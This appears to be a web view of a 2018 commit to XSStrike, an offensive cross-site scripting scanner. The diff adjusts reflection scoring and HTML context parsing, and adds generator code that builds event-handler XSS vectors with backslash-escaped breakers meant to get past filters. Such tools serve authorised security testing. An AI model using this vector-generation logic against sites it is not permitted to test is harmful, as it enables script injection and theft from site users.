s0md3v/XSStrike
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
Somdev Sangwan
2018-11-11 14:56:19 +05:30
committed by GitHub
parent 76e5ff2f66
commit 773dd7cae9
5 changed files with 29 additions and 13 deletions
Download Patch File Download Diff File Expand all files Collapse all files

22
core/checker.py
View File

@@ -7,7 +7,7 @@ from core.requester import requester
from core.utils import replacer, fillHoles
def checker(url, params, headers, GET, delay, payload, positions, timeout):
checkString = 'st4r7s' + payload
checkString = 'st4r7s' + payload + '3nd'
paramsCopy = copy.deepcopy(params)
response = requester(url, replacer(paramsCopy, xsschecker, checkString), headers, GET, delay, timeout).text.lower()
reflectedPositions = []
@@ -15,14 +15,24 @@ def checker(url, params, headers, GET, delay, payload, positions, timeout):
reflectedPositions.append(match.start())
filledPositions = fillHoles(positions, reflectedPositions)
# Itretating over the reflections
num = 0
efficiencies = []
for position in reflectedPositions:
for position in filledPositions:
allEfficiencies = []
try:
reflected = response[reflectedPositions[num]:reflectedPositions[num]+len(checkString)]
efficiency = fuzz.partial_ratio(reflected, checkString.lower())
allEfficiencies.append(efficiency)
except IndexError:
pass
if position:
reflected = response[position:position+len(checkString)]
efficiency = fuzz.partial_ratio(reflected, checkString.lower())
if reflected[-1] == '\\':
efficiency += 1
efficiencies.append(efficiency)
if reflected[:-2] == ('\\%s' % checkString.replace('st4r7s', '').replace('3nd', '')):
efficiency = 90
allEfficiencies.append(efficiency)
efficiencies.append(max(allEfficiencies))
else:
efficiencies.append(0)
return efficiencies
num += 1
return list(filter(None, efficiencies))

2
core/filterChecker.py
View File

@@ -37,4 +37,4 @@ def filterChecker(url, params, headers, GET, delay, occurences, timeout):
sortedEfficiencies[i][environment] = efficiency
for efficiency, occurence in zip(sortedEfficiencies.values(), occurences.values()):
occurence['score'] = efficiency
return occurences
return occurences

5
core/generator.py
View File

@@ -50,6 +50,11 @@ def generator(occurences, response):
for function in functions:
vector = breaker + filling + 'auTOfOcuS' + filling + 'OnFoCUs' + '=' + breaker + function
vectors[6].add(vector)
if breakerEfficiency == 90:
for filling in fillings:
for function in functions:
vector = '\\' + breaker + filling + 'auTOfOcuS' + filling + 'OnFoCUs' + '=' + '\\' + breaker + function
vectors[6].add(vector)
if attribute == 'srcdoc':
if occurences[i]['score']['<']:
if occurences[i]['score']['>']:

7
core/htmlParser.py
View File

@@ -24,9 +24,10 @@ def htmlParser(response):
else:
for i in deep:
if i[-2:] == '--':
location = 'comment'
break
continue
if '<!--' not in i:
location = 'comment'
break
continue
location = 'script'
for char in part:
if char == '<':

6
xsstrike.py
View File

@@ -173,9 +173,9 @@ def singleTarget(target, paramData):
if GET and not skipPOC:
flatParams = flattenParams(paramName, paramsCopy, vect)
webbrowser.open(url + flatParams)
choice = input('%s Would you like to continue scanning? [y/N] ' % que).lower()
if choice != 'y':
quit()
choice = input('%s Would you like to continue scanning? [y/N] ' % que).lower()
if choice != 'y':
quit()
elif bestEfficiency > minEfficiency:
print (('%s-%s' % (red, end)) * 60)
print ('%s Payload: %s' % (good, vect))